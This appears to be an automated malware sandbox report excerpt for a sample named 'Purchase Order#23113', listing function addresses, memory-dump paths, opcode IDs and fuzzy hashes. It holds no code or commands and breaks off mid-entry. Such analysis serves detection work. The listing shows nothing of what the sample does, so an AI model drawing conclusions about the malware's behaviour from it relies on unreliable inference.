                                                                            • Opcode ID: 431ce143de8a215c61003ccc4f719c4a6b4be3fb627af48863f6b8c831a9a48d
                                                                            • Instruction ID: 1e491137c3a49fd3c9d48149442c6dada7ddbe6f6c25b11f97fbfb3f4c8a3c29
                                                                            • Opcode Fuzzy Hash: 431ce143de8a215c61003ccc4f719c4a6b4be3fb627af48863f6b8c831a9a48d
                                                                            • Instruction Fuzzy Hash: DE312674E1560ADFCB48CFA9D9455AEBFF2FB88200F10C4AA9805E7344EB345A418B95
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 013DD01C Relevance: .1, Instructions: 72COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1769843698.00000000013DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 013DD000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_13dd000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 8b0f5d1514423aa1323a7657c043aff3f87509e2b2f00e47d688fbd73b2bbe2a
                                                                            • Instruction ID: 2ed579438782dd83e805099dff40a12e95663d53f8235ce356660f1741eb3630
                                                                            • Opcode Fuzzy Hash: 8b0f5d1514423aa1323a7657c043aff3f87509e2b2f00e47d688fbd73b2bbe2a
                                                                            • Instruction Fuzzy Hash: 74212272604204DFCB15DF68E984B26BFA5FBC8318F20C56DE80A4B296C33AD447CA61
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 05B66628 Relevance: .1, Instructions: 71COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1773583742.0000000005B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_5b60000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 6f14f0bd4ffa40c9c1ce6a0e203b3ae87ca8f62ea8b0fab7b78a463c122702f8
                                                                            • Instruction ID: 31c9faa2365ae357bd487072b995ae069f6a62913c70da44218a4d696820c007
                                                                            • Opcode Fuzzy Hash: 6f14f0bd4ffa40c9c1ce6a0e203b3ae87ca8f62ea8b0fab7b78a463c122702f8
                                                                            • Instruction Fuzzy Hash: C4211474E1520ADFCB48CFAAD5445AEBBF6FB88200F10C4AA9805E7344EB346A419B95
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 05B6AB70 Relevance: .1, Instructions: 67COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1773583742.0000000005B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_5b60000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 7c4d0d9cfefba142afe4c0c06036b6789432955004a08b5c324fd2a936dd7669
                                                                            • Instruction ID: f032ad0d5a049fdce8664cb8a7b89f22f208751855e83523390c88cb67314a65
                                                                            • Opcode Fuzzy Hash: 7c4d0d9cfefba142afe4c0c06036b6789432955004a08b5c324fd2a936dd7669
                                                                            • Instruction Fuzzy Hash: BF31C0B0D11218AFDB20DF99C588B9EBFF5FB08314F248069E408BB250C7B96885CF95
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 05B68907 Relevance: .1, Instructions: 62COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1773583742.0000000005B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_5b60000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 2e6bc6cc30eb6e6b9e8d5e07609c7d8c2c4271a9c68392751884b160077496df
                                                                            • Instruction ID: 12c0cf029788217917630f9a5971b6eec203296b3b888e3fd8365f76b1c43419
                                                                            • Opcode Fuzzy Hash: 2e6bc6cc30eb6e6b9e8d5e07609c7d8c2c4271a9c68392751884b160077496df
                                                                            • Instruction Fuzzy Hash: 7C2119B5E00209EFCB41DFA5D881A9EBFB1FF48300F1080AAE805A7250D7309B51DF94
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 05B68918 Relevance: .1, Instructions: 61COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1773583742.0000000005B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_5b60000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: d807633dc06d1a9e52b7e5ddabd7f48fe32b0fecd76eee4d8cffe4be9df18946
                                                                            • Instruction ID: f457f031e9a7d06afa266c9735f9f239958b6c7de7d90bacc6d5fe8dba3b975d
                                                                            • Opcode Fuzzy Hash: d807633dc06d1a9e52b7e5ddabd7f48fe32b0fecd76eee4d8cffe4be9df18946
                                                                            • Instruction Fuzzy Hash: D721C474E10209EFCB41DFA9D982A9EBBB1FB48300F1081A5E909A7251DB70AB51DF94
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 05B687A8 Relevance: .1, Instructions: 60COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1773583742.0000000005B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_5b60000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: f4d0000dc081472c187f48399e34da59cdab6c0e2c1e69143d63b7eefab1c114
                                                                            • Instruction ID: 92b0a4ff5e3470004ce97538336e3aaf7e217708d6cb4352c0370dbc06f5ca5c
                                                                            • Opcode Fuzzy Hash: f4d0000dc081472c187f48399e34da59cdab6c0e2c1e69143d63b7eefab1c114
                                                                            • Instruction Fuzzy Hash: 0021A674A10A08DFD744CF5AE285999BBF5FF8C310B6280D4E849AB365DB31EE11DB04
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 05B6AEDA Relevance: .1, Instructions: 60COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1773583742.0000000005B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_5b60000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 2b5d3b67c5a6f4a931bfcf22b95d8438de4af9439863f12c2faf6d780e868007
                                                                            • Instruction ID: 1557915563b27ea1e94a9f8998ba35f65a65047496604e72f128c2a1b8d69d4f
                                                                            • Opcode Fuzzy Hash: 2b5d3b67c5a6f4a931bfcf22b95d8438de4af9439863f12c2faf6d780e868007
                                                                            • Instruction Fuzzy Hash: E511A371B006169B9B11EAB99884ABFBBFBFFC4260B144529E815E7340EF34ED0547A0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 013DD006 Relevance: .1, Instructions: 60COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1769843698.00000000013DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 013DD000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_13dd000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: d41474449021aba6c1261ce4e4829ad3fa408ae4abebaec4f5eebd36ff9ac012
                                                                            • Instruction ID: 6303f4aca7ec4d911e342b56e3a4d6baaf25cc8c3e89a6ba9ba4ac39331623ca
                                                                            • Opcode Fuzzy Hash: d41474449021aba6c1261ce4e4829ad3fa408ae4abebaec4f5eebd36ff9ac012
                                                                            • Instruction Fuzzy Hash: 9A21A1765093808FDB13CF24D994715BF71EB85218F28C5EAD8498F6A7C33AD40ACB62
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 05B6AD24 Relevance: .1, Instructions: 56COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1773583742.0000000005B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_5b60000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 4587e2dda93e6a33ce63f8bf54aabb57840227363b3221f31ceda20066dcd458
                                                                            • Instruction ID: 506aa7c92f721aef9961d30f0580c91722283867c1254f0dbe745222f8810f52
                                                                            • Opcode Fuzzy Hash: 4587e2dda93e6a33ce63f8bf54aabb57840227363b3221f31ceda20066dcd458
                                                                            • Instruction Fuzzy Hash: 542106B59002499FCB10DF9AD844ADEBFF4FB48310F10846AE959A7210C378A944CFA5
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 05B68B48 Relevance: .1, Instructions: 56COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1773583742.0000000005B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_5b60000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 3c347b6ce4166d855b26c5e70f9bef0cd944c325b0f117c2afb8425a517c66fb
                                                                            • Instruction ID: dbfd9de5224a1a5f5ec5f4e3a88765117adfba5c67cbc531177bb4c1d416d04e
                                                                            • Opcode Fuzzy Hash: 3c347b6ce4166d855b26c5e70f9bef0cd944c325b0f117c2afb8425a517c66fb
                                                                            • Instruction Fuzzy Hash: 2D117C75E012189FCB04CF99D445BEEBBF6FB88320F189065E405A7380DB75A989CBD0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 05B6B44E Relevance: .1, Instructions: 54COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1773583742.0000000005B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_5b60000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: b0a455ead668170c0fa5d3e7c7e8aa1ff8399b10e4b0bd583a32bc8ac9baa221
                                                                            • Instruction ID: c990c7095ea2846babfecaf4645e8b20c21c8940fb56258dfddef8c0e60d07bc
                                                                            • Opcode Fuzzy Hash: b0a455ead668170c0fa5d3e7c7e8aa1ff8399b10e4b0bd583a32bc8ac9baa221
                                                                            • Instruction Fuzzy Hash: 13119D71804259DBDB10CFA9C9447EA7BB5FF05325F1082A9E861EB290C7399542CB90
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 05B68869 Relevance: .0, Instructions: 47COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1773583742.0000000005B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_5b60000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: b83a2f79a8183f9a2a4b0efd882607abf9d58e40c9a219d47475e4831cfe05f6
                                                                            • Instruction ID: 69626599f301ce270fcc37277c26cebb10e293362d98a2b59d7053de0127bec8
                                                                            • Opcode Fuzzy Hash: b83a2f79a8183f9a2a4b0efd882607abf9d58e40c9a219d47475e4831cfe05f6
                                                                            • Instruction Fuzzy Hash: 6511C578910608EFCB44DF8AE185998BFB4FB48310F5250D5E886A7355DB31E9A0CB49
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 012BD731 Relevance: .0, Instructions: 45COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1769770147.00000000012BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012BD000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_12bd000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: e9fb758fe95d4f1eb16cc5d04aff2c13a24770fee7ae1569e18f1a13eab3c404
                                                                            • Instruction ID: 06f26c693cb5c18df5b1760695bccdd3e638efb19e295eb96f7a26dfa8460664
                                                                            • Opcode Fuzzy Hash: e9fb758fe95d4f1eb16cc5d04aff2c13a24770fee7ae1569e18f1a13eab3c404
                                                                            • Instruction Fuzzy Hash: 5B0120310143889AE7154A69CDC47E7FFD8EF40368F18C429EE084E152C279D840D7B1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 05B6C49A Relevance: .0, Instructions: 42COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1773583742.0000000005B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_5b60000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 84f1ebec856ddd6983d2e9fc33edc1b87b76adcda4fd2d0c05446a4ab5f50e46
                                                                            • Instruction ID: 783232779a961d742f3eea97e72fa6437e57e763907c197879a4c0afd9bf506e
                                                                            • Opcode Fuzzy Hash: 84f1ebec856ddd6983d2e9fc33edc1b87b76adcda4fd2d0c05446a4ab5f50e46
                                                                            • Instruction Fuzzy Hash: C201D631108285AFCF06DB64DC65AAD3FB1EF06214F0940EBD085EB163D63AA816C765
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 05B68878 Relevance: .0, Instructions: 42COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1773583742.0000000005B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_5b60000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: dca380841b0eb0117c52bcf8e32827778d2b3fd14cf6b3de26f7e51f55ae0425
                                                                            • Instruction ID: 609e6e895aded6e83bd1112074d4c0bc8216f3bc9b2cd13052106e4184044a92
                                                                            • Opcode Fuzzy Hash: dca380841b0eb0117c52bcf8e32827778d2b3fd14cf6b3de26f7e51f55ae0425
                                                                            • Instruction Fuzzy Hash: 4F11A578910608DFCB44DF8AE185898BFF4FB4C310F5290C4E88667365DB31A9A0CB19
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 012BD730 Relevance: .0, Instructions: 36COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1769770147.00000000012BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012BD000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_12bd000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: ba8617eb9100885a3368e0b88c32ce6560fb23fc736dfe5fc7218c64e277f23d
                                                                            • Instruction ID: e7e37b131b1c705e6886f27d0a376e5fc068254ad8b4c2e7728c550351acb531
                                                                            • Opcode Fuzzy Hash: ba8617eb9100885a3368e0b88c32ce6560fb23fc736dfe5fc7218c64e277f23d
                                                                            • Instruction Fuzzy Hash: B0F0FC710043449EE7158A1ACCC4BE2FFD8EF40378F18C45AEE080F282C2799840CBB1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 05B6B458 Relevance: .0, Instructions: 34COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1773583742.0000000005B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_5b60000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 8dc9a1a505df6121261ddf0fa2292cc7e92f51eda9359616846da2ba0aa23272
                                                                            • Instruction ID: 64a283fcd6c26d7f5c479c667736f35631808679b5b773613e443f6f2c6ee06c
                                                                            • Opcode Fuzzy Hash: 8dc9a1a505df6121261ddf0fa2292cc7e92f51eda9359616846da2ba0aa23272
                                                                            • Instruction Fuzzy Hash: 7C01FB70800219DFDB14CF6AC4487AEBAF1FF48360F10C269E825EA2A0D7785A40CFD0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 05B6A358 Relevance: .0, Instructions: 27COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1773583742.0000000005B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_5b60000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: c415fd722a9aa30734cc6e596a1fab85b5c21fe861c520aa6043878b26bd9cc9
                                                                            • Instruction ID: 7044b5ddde15da94dc795bcb02b001a45e6d1a5e96607ee3bcc9366fce0dcf49
                                                                            • Opcode Fuzzy Hash: c415fd722a9aa30734cc6e596a1fab85b5c21fe861c520aa6043878b26bd9cc9
                                                                            • Instruction Fuzzy Hash: B8F01CB4D04219EFCB41EFB8D9457AEBFB4FB04300F0085AAE855A3341E774A651DB85
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 05B678C1 Relevance: .0, Instructions: 24COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1773583742.0000000005B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_5b60000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: d69d5f14fc39539869c41d6441a39803eb2f36aa53b535cc00ee19424fb92786
                                                                            • Instruction ID: 82e8c6eecc14c42d41b74f3af67bb19b87f3a2ff21e634fce2a7e14206b40b30
                                                                            • Opcode Fuzzy Hash: d69d5f14fc39539869c41d6441a39803eb2f36aa53b535cc00ee19424fb92786
                                                                            • Instruction Fuzzy Hash: 6CF0BE349002599FCB11CFA8C844A9CBFB1FF05320F00829AE8A857761C735A642DF80
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 05B678D0 Relevance: .0, Instructions: 23COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1773583742.0000000005B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_5b60000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 502fbd0120a0b61103dea8d6b92bd137b3f99d4e8808a45f1d113c4311da2077
                                                                            • Instruction ID: ccc30cfd883f9d2d64c0bf348e2f9656165efd71457357dd99bdc8cbcfed423e
                                                                            • Opcode Fuzzy Hash: 502fbd0120a0b61103dea8d6b92bd137b3f99d4e8808a45f1d113c4311da2077
                                                                            • Instruction Fuzzy Hash: 41F09874D00218AFCB40DFA8D545AADBBF4FB08310F10859AE81997310D775AA51DB81
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 05B6A368 Relevance: .0, Instructions: 21COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1773583742.0000000005B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_5b60000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: f0801df5d7267f1bae4ecd70eb9333d5e5e19d545646199a19df65772eac0e39
                                                                            • Instruction ID: 9b82901d80ce77c21a557875feb016db2e8991b2c01da9335a5e0b2f56664abc
                                                                            • Opcode Fuzzy Hash: f0801df5d7267f1bae4ecd70eb9333d5e5e19d545646199a19df65772eac0e39
                                                                            • Instruction Fuzzy Hash: 21E0C974D00219DFCB44DFA8D4416ADBBB5FB44300F1085AAE814A3340D7715651DB95
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 05B67A70 Relevance: .0, Instructions: 21COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1773583742.0000000005B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_5b60000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 2d0311ee04afb31452003011186726ca57b65adc6deb098021347c0062c35346
                                                                            • Instruction ID: 928e16355fe9643f699f9a1f39fdbe3684271c377579c565d55496d1f802c063
                                                                            • Opcode Fuzzy Hash: 2d0311ee04afb31452003011186726ca57b65adc6deb098021347c0062c35346
                                                                            • Instruction Fuzzy Hash: A0E01A74E14209AFCB50DFF8D88579DBFB4EB08200F0081EA9829E3241EA746A54CF85
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 05B665D8 Relevance: .0, Instructions: 19COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1773583742.0000000005B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_5b60000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 3cad183bf1873cfe9eefdc23472f0c417c7c81b98ea4bf9d593ef2207ed24f9d
                                                                            • Instruction ID: 7534a4c3dea7a5fa2306e1f6d46af867a29e30fce5f4b693354eb8cb7400cdd8
                                                                            • Opcode Fuzzy Hash: 3cad183bf1873cfe9eefdc23472f0c417c7c81b98ea4bf9d593ef2207ed24f9d
                                                                            • Instruction Fuzzy Hash: D3E0C231D68019CEDB00EFB8A8467E97FB4AB00204F2405A5C84893260D7704A05D780
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 05B6DA70 Relevance: .0, Instructions: 19COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1773583742.0000000005B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_5b60000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 8801131f0b7ea3c183324006676e06fe8827c5c1fb4a4a492165a3dd72ce5d1c
                                                                            • Instruction ID: d3fb9ab3933f07b7212e6ea83be15afd62cb22a8bb7e848154273e0094e7c61b
                                                                            • Opcode Fuzzy Hash: 8801131f0b7ea3c183324006676e06fe8827c5c1fb4a4a492165a3dd72ce5d1c
                                                                            • Instruction Fuzzy Hash: 1CE09A74E142089FC780DFA9D445A9CBBF4FB08610F0081EAE819D7350E7749A40CF41
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 05B67A80 Relevance: .0, Instructions: 17COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1773583742.0000000005B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_5b60000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: c826a291efb7178323ee105c4becfcb8f14bc6c4c9ba122754535bc2241a4d09
                                                                            • Instruction ID: a90474c5571111010ddfd15203ad28c51daebd5c2970aef262bed2d065d4af46
                                                                            • Opcode Fuzzy Hash: c826a291efb7178323ee105c4becfcb8f14bc6c4c9ba122754535bc2241a4d09
                                                                            • Instruction Fuzzy Hash: 8EE0EC74D10209AFCB90DFB8D44569CBBF4FB04200F0081EA9828A3240EB745A54CF81
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 05B68E58 Relevance: .0, Instructions: 17COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1773583742.0000000005B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_5b60000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 8efb502ec76456c3a2e036c197b188ea7ec8435d9f040e61c9c6d94ba4b8d1b3
                                                                            • Instruction ID: 3d6ee90d3b0034b9aba7f4a6885f15f2a188f60f3b06c1e4b1569664183a948f
                                                                            • Opcode Fuzzy Hash: 8efb502ec76456c3a2e036c197b188ea7ec8435d9f040e61c9c6d94ba4b8d1b3
                                                                            • Instruction Fuzzy Hash: 30D0A9362883254AD204A6C9AA163A9366CEB02394F040020BE0A867D2CEAAE41092DD
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 05B665E8 Relevance: .0, Instructions: 15COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1773583742.0000000005B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_5b60000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 454e146a209614aff0132d38574473916b991fde39f9f89bc2136d6dec9ab578
                                                                            • Instruction ID: 3b131b2adf7e3a1187c4c3fcb5efe418903ce7aea985e0ed1760eeb19749144a
                                                                            • Opcode Fuzzy Hash: 454e146a209614aff0132d38574473916b991fde39f9f89bc2136d6dec9ab578
                                                                            • Instruction Fuzzy Hash: 41D0A930D1520DDFCB40EFF8A94AAADBBB8AB00200F1041F9980993250EBB02F00DBC2
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 05B6F880 Relevance: .0, Instructions: 10COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1773583742.0000000005B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_5b60000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 6e1f43ea3fe323f7bbe17865e0e91b2b6445f73db7a68ea4505ac5a802945fda
                                                                            • Instruction ID: 552d0af0a3083dd0b606801415727ced50816e08db72706fb9ad659395c98b2c
                                                                            • Opcode Fuzzy Hash: 6e1f43ea3fe323f7bbe17865e0e91b2b6445f73db7a68ea4505ac5a802945fda
                                                                            • Instruction Fuzzy Hash: C5C08C340577048BC3202BA8F50E3387FACA740306F000050FD0A04410CFB43080CB69
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 05B68E68 Relevance: .0, Instructions: 10COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1773583742.0000000005B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_5b60000_Purchase Order#23113.jbxd
